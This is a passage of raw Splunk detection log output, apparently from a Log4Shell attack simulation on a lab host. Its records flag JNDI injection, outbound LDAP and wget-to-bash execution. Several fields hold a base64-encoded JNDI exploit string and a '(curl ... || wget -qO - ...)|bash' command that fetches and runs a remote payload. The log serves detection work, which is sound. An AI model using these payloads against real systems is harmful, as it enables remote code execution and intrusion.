detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640653, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Initial Access", annotations._all="T1059", annotations._all="PR.PT", annotations._all="DE.AE", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 13", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="T1190", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640651, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 5", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense 